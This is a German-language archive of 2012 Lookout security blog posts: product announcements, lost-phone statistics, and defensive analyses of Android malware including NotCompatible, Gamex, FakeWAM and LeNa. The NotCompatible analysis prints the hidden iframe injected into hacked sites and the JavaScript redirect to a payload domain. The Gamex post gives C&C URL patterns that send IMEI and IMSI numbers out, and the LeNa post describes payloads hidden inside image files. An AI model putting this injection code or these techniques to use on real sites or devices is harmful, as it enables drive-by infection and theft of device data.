15. Mai 2012
von lookout
Hallo, ni hao, 안녕하세요, приве́т!;
Hätte Lookout einen Reisepass, wären schon viele Stempel drin! Unsere preisgekrönte Android Sicherheits-App ist bei Google Play jetzt auch in Russisch, Koreanisch und traditionellem Chinesisch verfügbar. Diese drei Sprachen ergänzen die bereits lokalisierten Lookout-Versionen, die auf Deutsch, Französisch, Japanisch, Spanisch, Brasilianischem Portugiesisch, Polnisch und vereinfachtem Chinesisch für unsere weltweiten Nutzer bereitstehen.
Nutzer aus aller Welt können ihre Mobilgeräte jetzt in ihrer eigenen Sprache schützen. Mit den neu hinzugefügten Sprachenversionen ist Lookout jetzt in elf verschiedenen Sprachen verfügbar! Hier sind ein paar interessante Fakten, die zum heutigen Launch passen:
mehr
04. Mai 2012
von lookout
2. Update: Auf Basis unsere letzten Analysen ist NotCompatible ein neuer Android-Trojaner, der anscheinend als einfacher TCP-Relay-Proxy fungiert und sich als Systemupdate ausgibt. Diese Bedrohung scheint zur Zeit keine unmittelbaren Schäden auf dem betroffenen Gerät zu verursachen. Sie könnte jedoch potenziell genutzt werden, um unerlaubten Zugriff zu privaten Netzwerken zu erhalten, indem ein infiziertes Android-Gerät zu einem Proxy gemacht wird. Wie zuvor erwähnt, ist das vermutlich das erste Mal, dass angegriffene Websites zur Verbreitung von Malware an Android-Geräte verwendet werden.
Die Verbreitung von NotCompatible geht von gehackten Websites aus, bei denen auf jeder Seite im Quellcode ein iframe versteckt ist. Wenn ein Benutzer eine betroffene Website von einem Android-Gerät aus aufruft, beginnt der Webbrowser des Mobilgeräts automatisch mit dem Download der NotCompatible-Anwendung namens „Update.apk“. Genau wie bei allen Drive-by-Downloads muss ein Benutzer die heruntergeladene Anwendung installieren, bevor das Gerät infiziert wird. Auf Grundlage unserer ersten Untersuchungen konnten wir bestätigen, dass zahlreiche Websites beeinträchtigt wurden. Jedoch scheint auf den jeweiligen Sites recht wenig Datenverkehr zu herrschen, so dass wir davon ausgehen, dass die Beeinträchtigung von Android-Benutzern insgesamt gering sein wird.
Dieses konkrete Exemplar ist relativ gut aufgebaut. Dennoch hat man sich anscheinend nicht sonderlich bemüht, seinen eigentlichen Zweck zu verbergen, nämlich die Tatsache, dass man damit auf private Netzwerke zugreifen kann. Dieses Merkmal an sich könnte für IT-Systemadministratoren von Belang sein: Ein mit NotCompatible infiziertes Gerät kann möglicherweise benutzt werden, um Zugang zu normalerweise geschützten Informationen oder Systemen zu erlangen, wie sie Unternehmen oder Regierungsbehörden betreiben.
Update: Alle Lookout-Benutzer sind vor NotCompatible geschützt. Lookout schützt Benutzer vor Drive-by-Downloads, wenn die Funktionen File System Monitoring (Dateisystemüberwachung) und Install Monitoring (Installationsüberwachung) aktiv sind. Diese zusätzlichen Schutzebenen warnen die Benutzer beim Download bekannter Bedrohungen in den Gerätespeicher, z. B. den Ordner „/Downloads“ auf der SD-Karte, und unmittelbar vor der Installation per Sideloading.
Gehackte Websites werden häufig eingesetzt, um PCs mit Malware zu infizieren. Heute haben wir jedoch erstmalig gehackte Websites identifiziert, die speziell auf Mobilgeräte abzielen. Lookout ist dabei, ein Update zum Schutz vor der neuen Bedrohung NotCompatible herauszugeben.
Funktionsweise
Wenn in diesem konkreten Fall ein Benutzer eine infizierte Website von einem Android-Gerät aus besucht, beginnt sein Webbrowser automatisch mit dem Download einer Anwendung. Dieses Verfahren bezeichnet man gemeinhin als Drive-by-Download.
Sobald die verdächtige Anwendung heruntergeladen wurde, wird am Gerät eine Meldung angezeigt. Der Benutzer wird aufgefordert, darauf zu klicken, um die heruntergeladene App zu installieren. Um die App tatsächlich auf einem Gerät zu installieren, muss die Einstellung „Unbekannte Quellen“ unter Anwendungen aktiviert sein (im Allgemeinen als „Sideloading“ bezeichnet). Ist diese Einstellung auf dem Gerät nicht aktiviert, wird die Installation blockiert.
(Screenshots ursprünglich veröffentlicht durch Redditor Georgiabiker)
Technische Angaben
Auf infizierten Websites ist meist der folgende Code eingefügt:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
Wenn ein PC-basierter Webbrowser die Site gaoanalitics.info aufruft, wird der Fehler „Not found“ (Nicht gefunden) ausgegeben. Greift jedoch ein Webbrowser mit dem Wort „Android“ im User-Agent-Header auf die Seite zu, wird Folgendes ausgegeben:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
Diese Seite veranlasst den Browser dazu, sofort den Zugriff auf die Seite ndroidonlinefix.info zu versuchen. Wie bei der vorherigen Site lösen nur Browser, welche die User-Agent-Zeichenfolge „Android“ senden, einen Download aus. Bei allen anderen wird eine leere Seite angezeigt. Beim Besuch dieser Seite von einem Android-Browser gibt der Server eine Android-Anwendung zurück, die einen Android-Browser zum automatischen Download veranlasst.
Verdächtige Anwendungen werden zurzeit von folgenden Websites verbreitet:
- gaoanalitics.info
- androidonlinefix.info
Command- und Control-Server (C&C):
Wir sind noch dabei, das ganze Ausmaß infizierter Websites zu bestimmen. Es gibt jedoch erste Anzeichen dafür, dass zahlreiche Sites betroffen sein könnten. Sobald wir bei Lookout die infizierten Websites identifiziert haben, wird dieser Blogpost aktualisiert.
04. Mai 2012
von lookout
Heute freuen wir uns, Ihnen zwei neue Funktionen von Lookout für Android vorzustellen: Die Dateisystemüberwachung und die Installationsüberwachung. Diese kostenlosen Funktionen bieten zusätzlichen Schutz vor Malware und Spyware, insbesondere für diejenigen, die Apps gerne aus einer Vielzahl verschiedener Quellen herunterladen. Genau wie für die zentrale Sicherheitsfunktion bildet das Mobile Threat Network von Lookout die Grundlage für diese neuen Features.
Wenn Sie Apps aus alternativen Märkten oder anderen Quellen wie Foren herunterladen (im Allgemeinen als „Sideloading“ bezeichnet), erhalten Sie mit der Dateisystemüberwachung und der Installationsüberwachung ein zusätzliches Maß an Sicherheit. Lookout schützt die Benutzer bei diesem Sideloading bereits bei der Installation durch einen sofortigen Scan. Diese beiden neuen Funktionen bieten jedoch die einzigartige Möglichkeiten zur Erkennung von Bedrohungen, bevor sie auf einem Gerät installiert werden.
Die Fähigkeit zum Download von Apps aus einer Vielzahl von Quellen gilt als eine der besonderen Stärken von Android. Wir raten jedoch im Allgemeinen, beim Sideloading oder dem Download von Apps außerhalb des offiziellen Android Markets (alias Google Play) Vorsicht walten zu lassen und so das Malware-Risiko auf ein Minimum zu begrenzen. Wir wissen, dass viele unserer Benutzer gerne alles im Zusammenhang mit Android ausprobieren, auch wenn sie dabei Apps aus völlig unbekannten Quellen herunterladen. In diesen Fällen stehen die Dateisystemüberwachung und die Installationsüberwachung für ihren Schutz bereit.
Dateisystemüberwachung
Die Dateisystemüberwachung überprüft Ihre SD-Karte aktiv auf Dateiänderungen. Wenn eine neue App auf Ihre SD-Karte gespeichert, aber noch nicht installiert wurde, werden Sie in Echtzeit gewarnt, sofern es sich um Malware handelt. Dieses aktive Monitoring ist ein viel besserer Überwachungsmechanismus für Ihre SD-Karte als ein geplanter Scan des Dateisystems. Die Funktion ist außerdem so konzipiert, dass sie die Akkulaufzeit nicht beeinträchtigt. Ein für Dienstag vorgesehener Dateisystem-Scan sagt sechs Tage lang nichts über die Malware aus, die Sie am Mittwoch heruntergeladen haben!
Poweruser aufgepasst! Die Dateisystemüberwachung beruht auf der Fähigkeit, die SD-Karte auf Änderungen zu überwachen. Deshalb ist die Funktion bei den meisten Sideloading-Methoden effektiv, beispielsweise wenn Sie eine App aus dem Internet oder einer E-Mail direkt auf Ihr Mobilgerät herunterladen. In Fällen, in denen Sie Ihre SD-Karte zur manuellen Übertragung von Apps herausnehmen, ist die Dateisystemüberwachung nicht in der Lage, neue Apps zu scannen, die Sie übermitteln. An dieser Stelle kommt die Installationsüberwachung ins Spiel…
Installationsüberwachung
Lookout für Android ist die erste Sicherheits-App mit einer Installationsüberwachung. Das gibt Ihnen die Möglichkeit, per Sideloading erhaltene Apps zu Beginn des Installationsprozesses zu scannen. Wenn Sie zur Installation auf ein .apk-Paket tippen, werden Sie von der Installationsüberwachung gefragt, ob Sie die App vor der Installation scannen möchten. Wird eine App als sauber getestet, geht die Installation normal weiter und Sie werden dadurch nicht beeinträchtigt. Sie können sogar als Standardverhalten festlegen, dass Lookout automatisch Scans von allen zukünftigen Sideload-Installationen durchführt!
Beachten Sie, dass Apps aus Google Play automatisch heruntergeladen und auf Ihrem Gerät installiert werden, so dass der vorhandene Sicherheitsscan von Lookout immer noch ein unverzichtbares Element für den Schutz der Benutzer von Mobilgeräten ist.
Als bestehender Nutzer von Lookout Free oder Lookout Premium installieren Sie einfach das neueste Update von Lookout für Android, um Zugang zu diesen Funktionen zu erhalten. Die automatische Dateiüberwachung lässt sich in der Lookout-App unter „Einstellungen >Sicherheit“ ausschalten. Darüber hinaus können Sie auch Präferenzen für die Installationsüberwachung festlegen: bei erstmaliger Installation einer Sideload-App im Android-Standarddialog und anschließend in der Lookout-App in den Systemeinstellungen im Abschnitt „Launch By Default“ (Standardmäßig starten).
Wir glauben, dass diese neuen Funktionen wirklich eine wichtige neue Sicherheitsausstattung für Poweruser sind – sozusagen die Geländereifen für Ihre Android-Aktivitäten abseits der ausgetretenen Pfade! Teilen Sie uns mit, was Sie davon halten!
04. Mai 2012
von lookout
Letzte Woche hat Lookout den neuen Trojaner Gamex identifiziert. Dieser neue Android-Trojaner versteckt sich in wiederverpackten Versionen legitimer Anwendungen, die Root-Zugriff auf das Handy brauchen. Die Gamex-Funktion teilt sich auf drei Komponenten auf, die miteinander interagieren, um das Gerät zu infizieren, mit seinem Host zu kommunizieren und unbemerkt Anwendungen auf dem Gerät zu installieren. Der Trojaner wurde zuerst in alternativen Märkten über das Mobile Threat Network von Lookout entdeckt. Bisher schätzt man die Auswirkungen im Allgemeinen als gering ein. Die Bedrohung wurde erkannt und blockiert, so dass alle Lookout-Benutzer geschützt sind.
Funktionsweise
Gamex setzt auf wiederverpackten Versionen von Anwendungen auf, die Root-Zugang benötigen, wie beispielsweise Dateimanager, Werbeblocker und Anwendungen zur Steigerung der Geräteleistung. Wenn ein Benutzer der Anwendung Root-Zugriff gewährt, missbraucht Gamex diese Berechtigung, um eine andere Anwendung auf der Systempartition des Gerätes zu installieren, die als privilegierter Installationsdienst fungiert. Eine dritte Komponente kommuniziert mit einem Remoteserver, lädt Apps herunter und löst deren Installation aus. Außerdem meldet Gamex die Installation dieser Anwendungen zusammen mit der IMEI-Gerätenummer und der IMSI-Nummer der SIM-Karte an einen Remoteserver. Wir glauben, dass diese Informationen benutzt werden, um Installationen auszuführen und an ein bösartiges Affiliate-Netzwerk für die Vermarktung von Apps zu berichten.
Wenn Sie sich für die technischen Aspekte der Funktionsweise von Gamex interessieren, lesen Sie auch den Text nach unseren Tipps.
Hier finden Sie einige Tipps, wie Sie Ihr Handy vor Constellation-Malware wie Gamex schützen können:
- Laden Sie nur Apps von vertrauenswürdigen Quellen herunter, beispielsweise von seriösen App-Stores und Download-Anbietern. Lesen Sie sich die Berechtigungen durch, und achten Sie auf die Namen der Entwickler, Kundenrezensionen und Sternebewertungen.
- Achten Sie auf ungewöhnliche Verhaltensweisen auf Ihrem Handy, denn diese könnten darauf hindeuten, dass es infiziert ist. Zu diesen Verhaltensweisen können ungewöhnliche SMS-Nachrichten, seltsame Gebühren auf der Telefonrechnung und eine plötzlich verringerte Lebensdauer des Akkus gehören.
- Installieren Sie eine App für mobile Sicherheit auf Ihrem Handy, die jede heruntergeladene App scannt. Für zusätzlichen Schutz sollten Sie überprüfen, ob Ihre Sicherheits-App Sie auch beim Besuchen unsicherer Websites warnt.
- Laden Sie immer die aktuellsten Firmware-Updates herunter, sobald diese für Ihr Gerät verfügbar sind.
Gamex – Technische Übersicht
App-Dropper
In jedem bisher analysierten Fall war die Dropper-Anwendung eine wiederverpackte Version einer legitimen Anwendung, die Root-Zugriff erfordert, darunter Dateimanager, Werbeblocker und Anwendungen zur Leistungssteigerung. Beim Start dieser Dropper-App verlangt der eingespeiste Code Root-Zugriff. Sobald dieser gewährt wird, kopiert er das eingebettete Paket „com.android.setting“ in das Verzeichnis /system/app/ComAndroidSetting.apk. Dieses Paket ist als „assets/logos.png“ in die verpackte App eingebettet und trivial verschleiert.
com.android.setting
Diese Payload enthält einen Broadcast-Receiver für einen benutzerspezifischen Aktions-Intent. Der Intent dient der Aktivierung der Payload und interagiert mit dieser als privilegierter Installationsdienst. Diese Paylpad berichtet beim Start die IMEI, IMSI und das, was wir als „Kampagnen-ID“ interpretieren, als <url>/inputex/index.php?s=/Interface/keinter/a1/<IMEI>/a2/<IMSI>/a3/<CMP_PID> an ihren C&C-Server. Falls noch nicht geschehen, wird eine dritte Payload, nämlich „com.android.update“, als „assets/icon.png“ eingebettet installiert und wiederum mit XOR trivial verschlüsselt.
com.android.update
Diese Nutzlast interagiert mit dem C&C-Dienst und verarbeitet App-Installationsanforderungen, wobei sie die Installation an „com.android.setting“ delegiert. Die Funktion wird durch eine Kombination aus Timern und der Beobachtung von Änderungen am Bildschirmstatus ausgelöst.
Broadcast-Receiver für Bildschirmstatus
com.android.update empfängt die Broadcasts SCREEN_ON und SCREEN_OFF. Beim Ausschalten des Bildschirms werden alle installierten Apps gestartet und kommunizieren mit <url>/inputex/index.php?s=/Interface/neiinter/a1/<IMEI>/nam/<app>. Falls bei diesem Prozess Apps gestartet werden, wird der Startbildschirm des Gerätes bei Eintreten von SCREEN_ON aufgerufen.
Anschließende App-Installationen
- Handler 1 – Alle 10 Minuten wird eine in com.android.update’s assets/logo.png angegebene URL aufgerufen. Dabei wird eine Seite mit etwa 10 Apps aufgerufen. Wenn diese zu dem Zeitpunkt nicht installiert sind, werden sie zum Download in eine Datenbank eingefügt.
- Handler 2 – Ein separater Handler lädt eine App herunter, die noch nicht heruntergeladen wurde. Dies ist jedoch vom Netzwerkstatus abhängig und erfolgt im WLAN alle 60 Sekunden und ansonsten alle 30 Minuten.
- Handler 3 – Ein dritter Handler überprüft alle 60 Sekunden, ob Apps heruntergeladen werden. Wenn eine Anwendung installiert wird, bleibt dieser Handler 4 Stunden lang im Schlafmodus, bevor er eine weitere App installiert. Die Installation wird per Broadcast-Intent an com.android.setting delegiert.
23. April 2012
von lookout
Wir arbeiten von nun an mit der Deutschen Telekom zusammen, um deren Kunden mit unserer kostenlosen Lookout-App auszustatten. Mit unserer Sicherheits-App sind den Telekom-Kunden bei der Nutzung ihrer Smartphones keine Grenzen gesetzt. Wir unterstützen sie bei ihrer mobilen Sicherheit sowie dem Schutz ihrer privaten Daten. Vielleicht arbeiten wir zukünftig sogar bei der Entwicklung neuer Apps für die beste Performance von Smartphones mit der Deutschen Telekom zusammen.
Diese Kooperation ist für Lookout ein Meilenstein. Die Deutsche Telekom ist bekannt für ihre Hightech-Innovationen und ihre umfangreichen Leistungen für ihre Kunden. Da beide Unternehmen die Entwicklung des besten mobilen Schutzes anstreben, können Sie sicher sein, auch in Zukunft mit spannenden News und Updates versorgt zu werden.
Die Partnerschaft mit der Deutschen Telekom folgt unmittelbar auf unsere Ankündigung mit T-Mobile USA, der US-Tochter der Deutschen Telekom, zusammenzuarbeiten. Allen Lookout-Nutzer mit T-Mobile-Geräten werden „Scream-Töne“ zur Verfügung gestellt, die mit Geräuschen wie Wolfsheulen oder Sirenen helfen sollen, ein verloren gegangenes Handy wiederzufinden. Dieses ist ein weiterer Schritt in die richtige Richtung: Wir kommen so unserem Ziel näher, in den Händen – oder besser gesagt auf den Smartphones und Tablets – von Menschen auf der ganzen Welt zu sein.
20. April 2012
von lookout
Lookout jetzt auch in Chinesisch und Polnisch für Android verfügbar
Wir lieben es, neue Sprachen für Lookout vorzustellen, denn so können wir mehr Menschen in ihrer eigenen Sprache vor den neuesten Malware-Bedrohungen bewahren. Heute kommen lokalisierte Lookout-Versionen in Vereinfachtem Chinesisch und Polnisch für Android raus. Wir sind sehr stolz darauf!
Es gibt neben Englisch und Deutsch jetzt sechs weitere Sprachen, in denen unsere Kunden Lookout für Android benutzen können. Wir finden, sieben ist eine Glückszahl! (Die anderen Sprachen sind Französisch, Japanisch, Spanisch und Brasilianisches Portugiesisch.)
Wenn Ihr Android eine dieser Sprachversionen als Einstellung hat und Sie Lookout vom Google Play Store (früher Android Market) runterladen bzw. aktualisieren und die App erscheint automatisch in der Sprache Ihrer jeweiligen Einstellung. Natürlich haben Sie auch in den lokalisierten Versionen gleichbleibenden kostenlosen Antivirenschutz, können Ihr Gerät orten und Backups machen. Lookout Premium bietet noch mehr Schutz und kostet 2,49 Euro im Monat oder 24,99 Euro im Jahr.
Lookout geht um die Welt – wir fügen weitere Sprachen hinzu. Bleiben Sie am Ball!
18. April 2012
von lookout
Die Bedrohung
Im ersten Quartal 2012 haben wir eine weitere Zunahme von Malware-Apps im Mobilbereich beobachtet, die kostenpflichtige SMS versenden und auf europäische Märkte abzielen. Der Aufbau vieler dieser Malware-Familien lässt eindeutig auf die gleiche Abstammung schließen und die Maßnahmen ihrer Verbreitung ähneln Affiliate-Marketingaktionen für legitime Apps. Zu diesen Familien gehören RuPaidMarket, DepositMobi, OpFake und weitere dazugehörige, betrügerische Installationsanwendungen.
Dieser Trend setzt sich fort, und Lookout hat in der letzten Woche zwei maßgebliche neue Variationen entdeckt. Eine scheint eine völlig neue Konstruktion zu sein und die andere eine wesentliche Weiterentwicklung (Variante) der gefälschten Installer-Apps. Zwar unterscheidet sich ihre Codebasis deutlich, doch stehen sie aufgrund der Verbreitungsart und erheblicher Überschneidungen der anvisierten Kurzcodes miteinander im Zusammenhang.
Wenn Sie zur Zeit Lookout verwenden, sind Sie bereits geschützt und brauchen keine weiteren Maßnahmen zu ergreifen.
Funktionsweise
FakeWAM ist eine Weiterentwicklung der Malware-Familie OpFake/RuPaidMarket, die durch den Versand von SMS zum Premiumtarif Gebührenbetrug begeht. Ähnlich wie bei den zuvor bekannt gewordenen Fällen gibt FakeWAM vor, den „WhatsApp Messenger“ zu installieren, was jedoch nicht erfolgt. Diese neue Variante ist insofern bedeutsam, als dass sie die „Reflection“-Methode anwendet. Damit kann ein Programm seine eigene Struktur und Verhaltensweisen beobachten und ändern, um mit Betriebssystemdiensten (insbesondere zum Versenden der SMS) zu interagieren. So entsteht ein völlig anderes Profil als bei den Anwendungen, die zur Erkennung ihrer Verwandten verwendet werden.
AlphaSMS ist eine untergeordnete, jedoch verwandte Familie. Die Anwendung hat die Gestalt eines Download-/Installationsprogramms für Apps, verschickt jedoch stattdessen hochpreisige SMS. Anschließend leitet sie den Benutzer auf eine Website, die weitere, potenziell bösartige Anwendungen zum Download enthält. AlphaSMS ist unkompliziert aufgebaut, aber effektiv.
Sowohl AlphaSMS als auch FakeWAM rufen Webseiten auf und wollen die Benutzer dazu zu bewegen, weitere Apps mit Gefahrenpotenzial auf ihren Geräten zu installieren. Unseren Stichproben zufolge teilen sich diese Quellen zu ungefähr 50/50 auf legitime Anwendungen und andere Gebührenbetrug begehende Malware auf.
Namen der Pakete:
- FakeWAM: Jk7H.PwcD
- AlphaSMS: dfjg6.Gtr6H
Wer ist betroffen?
Keine dieser Familien wurde in populären App-Markets gefunden. Demnach ist das Risiko für die Benutzer relativ gering.
So schützen Sie sich
- Laden Sie nur Apps von vertrauenswürdigen Quellen herunter, beispielsweise von seriösen App-Stores und Download-Anbietern. Lesen Sie sich die Berechtigungen durch und achten Sie auf die Namen der Entwickler, Kundenrezensionen und Sternbewertungen.
- Achten Sie auf ungewöhnliche Verhaltensweisen auf Ihrem Handy, denn diese könnten darauf hindeuten, dass es infiziert ist. Zu diesen Verhaltensweisen können ungewöhnliche SMS-Nachrichten, seltsame Gebühren auf der Telefonrechnung und eine plötzlich verringerte Lebensdauer des Akkus gehören.
- Installieren Sie eine App für mobile Sicherheit auf Ihrem Handy, die jede heruntergeladene App scannt. Für zusätzlichen Schutz sollten Sie überprüfen, ob Ihre Sicherheits-App Sie auch beim Besuchen unsicherer Websites warnt.
12. April 2012
von lookout
Wir sind vor kurzer Zeit auf eine interessante neue Variante unseres alten Bekannten „Legacy Native“ (LeNa) gestoßen. LeNa hatte ursprünglich die Gestalt einer legitimen Anwendung und versuchte, einen Benutzer zu verleiten, seinen bösartigen Code durch das Aufrufen des Super User-Hilfsprogramms zu aktivieren. Super User verwenden „gerootete “ Geräte, um Anwendungen bei entsprechender Anforderung gezielt Superuser-Berechtigungen zu gewähren. Nachdem die wiederverpackte Anwendung Root-Zugriff erlangt hatte, lief sie ordnungsgemäß, installierte jedoch eine native Binärdatei. Diese gewährte Fremden Fernzugriff auf das Gerät, darunter die Fähigkeit zur Installation weiterer Software, ohne den Benutzer darüber zu benachrichtigen. Aufgrund der Abhängigkeit vom Super User-Hilfsprogramm zur Erlangung von Root-Berechtigungen waren durch LeNa von vornherein nur solche Benutzer gefährdet, die ihre Geräte rooten – also eine recht kleine, wenn auch technisch versierte Benutzergruppe.
Kürzlich haben wir ein bedeutsames LeNa-Update identifiziert, das sich mit dem Exploit-Programm „GingerBreak“ Root-Rechte auf einem Gerät verschafft. Durch die Anwendung eines Exploit-Programms ist diese neue Variante von LeNa nicht mehr von Benutzereingriffen abhängig, um einen Root-Zugriff auf ein Gerät zu erlangen. Damit betrifft LeNa alle Benutzer von Geräten, die kein Patch für diese Schwachstelle besitzen (Versionen vor 2.3.4 ohne rückportierten Patch).
Alle Lookout-Benutzer sind bereits vor LeNa geschützt, und bislang ist diese schädliche Software nicht im Google Play Storeaufgetreten.
Funktionsweise
Diese neue Variante von LeNa verbirgt ihren schädlichen Code direkt nach dem „End of Image“-Marker einer ansonsten voll funktionsfähigen JPEG-Bilddatei.
Am Ende dieser Bilddatei wird ein Paar verschachtelte ELF-Binärdateien versteckt. Die eine nutzt die GingerBreak-Schwachstelle zum Starten der zweiten, die wiederum eine aktualisierte Version von LeNa ist. 
Wie bei der Vorgängerversion kommuniziert die LeNa mit einem entfernten Command- und Control-Server und empfängt Anweisungen zum Installieren zusätzlicher Pakete und Anschieben von URLs, die im Browser angezeigt werden sollen. Im Moment scheint der C&C-Server von LeNa sich auf die Übertragung eines einzigen Pakets auf das Gerät zu beschränken: com.the9.gamechannel, ein alternativer Market in chinesischer Sprache, der Android-Spiele veröffentlicht. Dieses Paket wird vom Benutzer unbemerkt installiert und anschließend gestartet. Als Konsequenz kann dieser alternative Market in vorderster Front auf einem Gerät erscheinen, nachdem der Benutzer es für einen längeren Zeitraum nicht bedient hat. Zwar hat dieser alternative Market viele Funktionen mit einem App-Store für Mobilgeräte gemeinsam, ist jedoch nicht als Nachahmung des offiziellen Google Play-Markets konzipiert.
mehr
05. April 2012
von lookout
Be
ruf: Industriemeister
Lookout-Nutzer seit: Juni 2011
Handy: Motorola Defy
Lieblings-Funktion von Lookout: App-Scanner, Geräteortung
Auf welche anderen Apps er nicht verzichten kann: „Querbeet, ich benutze wirklich alles.”
Wie er auf Lookout gekommen ist: „Ich habe im Android Market nach einer Sicherheits-App gesucht und mich dann aufgrund der guten Bewertungen für Lookout entschieden.”
Moral der Geschichte: Die Funktionen von Lookout können auch Sicherheitsexperten noch überraschen.
Wie Lookout den Tag gerettet hat
„Als meine Frau von einer ‚Weinfahrt’ zurückkam, hatte sie ihr Handy mit kompletter Handtasche im Reisebus vergessen. Zu dieser Zeit wussten wir aber nicht, ob sie die Tasche im Bus vergessen oder irgendwo verloren hatte. Zum Glück hatte ich 2 Wochen zuvor Lookout auf ihrem Handy installiert.
Ruck-Zuck hatten wir das Handy lokalisiert. Bevor wir weitere Schritte einleiteten, riefen wir die Reiseleiterin an. Diese erklärte uns, dass an dieser Adresse der Busfahrer wohnt und er wohl die Tasche erst mal an sich genommen hat. So war es dann auch. Wir holten dann einen Tag später die Tasche unversehrt bei seiner Arbeitsstelle ab.
Und jetzt kommt das Beste: Hauptberuflich arbeitet er nicht als Busfahrer, sondern bei der Regierung in der Abteilung für innere Sicherheit. Er wunderte sich nicht schlecht, als wir ihm erklärten, dass wir das Handy bei ihm zu Hause lokalisiert hatten.“
22. März 2012
von lookout
Heute möchten wir Mobile Lost & Found vorstellen, eine interaktive Webseite zum Thema Handy-Verlust. Dort können Sie sehen, in welchen Städten die meisten Handys verloren werden, die Plätze entdecken, an denen das besonders häufig geschieht und einen Überblick über die Kosten erhalten, die verlorene Handys weltweit verursachen.
Haben Sie schon einmal Ihr Handy verloren? Nicht unbedingt eine lustige Erfahrung, oder? Hoffentlich besitzen Sie die Lookout App (oder erinnern sich, wo Ihr Handy ist) und waren so in der Lage, es wiederzufinden. Allein im letzten Jahr halfen wir neun Millionen Menschen weltweit, ihr Handy zurückzubekommen – das ist ein Gerät alle 3,5 Sekunden! Das eigene Telefon zu verlieren, ist mehr als ein Ärgernis – es ist teuer. Verlorene Handys könnten – sofern sie nicht wiedergefunden werden – deutsche Nutzer dieses Jahr über 700 Millionen Euro kosten.
Dass der Verlust eines Mobiltelefons solch einen enormen Einfluss auf unsere Geldbörsen und das Alltagsleben haben kann, hat uns zu denken gegeben: An welchen Orten verlieren Menschen ihre Handys? Gibt es bestimmte Städte oder Orte auf der Welt, die für den Verlust von Telefonen prädestiniert sind? Was kann das Problem des Handyverlusts die Menschen kosten? Um einige Antworten zu bekommen, haben wir die Daten der 2011 verlorengegangenen Handys unserer weltweit mehr als 15 Millionen Nutzer untersucht und Mobile Lost & Found entwickelt, damit auch Sie entdecken können, was wir herausgefunden haben.
Mobile Lost & Found ist Teil unserer größeren Ressourcen-Seite, die ebenfalls heute veröffentlicht wird. Dort gibt es jede Menge Informationen, wie man mit einem neuen Smartphone richtig loslegt und was man tun kann, damit es sicher bleibt.
Hier ein Auszug aus unseren Ergebnissen:
- In Deutschland verlieren Handybesitzer etwa alle drei Jahre ihr Mobiltelefon. Bleibt es verschwunden, entsteht jedes Mal ein Schaden von etwa 190 Euro.
- Weltweit gehen zwei Drittel aller Handys zwischen 21.00 und 2.00 Uhr verloren (und ein bevorzugter Ort, ein Handy zu verlieren, sind Bars oder Kneipen – die Schlussfolgerung daraus lassen wir Sie selber ziehen!).
- Top-Plätze für den Verlust eines Handys sind Hotels, Bars, Kneipen und Diskos.
- Der Vergleich deutscher Großstädte zeigt deutliche Unterschiede in Bezug auf verlorengegangene Handys. So suchen Berliner einmal im Jahr und damit doppelt so häufig nach ihren Mobiltelefonen wie Münchner, Hamburger und Kölner.
- Während der Feiertage ist ein deutlicher Anstieg der Handyverluste zu verzeichnen. Allein zu Karnevalszeiten steigt die Wahrscheinlichkeit, in Köln das eigene Handy zu verlieren, noch einmal um 30 Prozent, in Paris sogar um satte 72 Prozent!
Um Kosten zu vermeiden, empfehlen wir Ihnen, einen individuellen Code auf Ihrem Handy zu vergeben (sodass niemand auf Ihre Daten zugreifen kann, wenn Sie Ihr Mobiltelefon verlieren) und eine App mit Handy-Ortungs-Funktion wie die von Lookout herunterzuladen.
Schauen Sie sich die Mobile Lost & Found-Seiten an und teilen Sie uns im Kommentarbereich mit, was Sie darüber denken!
Kostenloser Download
Mehr Infos
© 2012 Lookout, Inc. Alle Rechte vorbehalten. Patente angemeldet.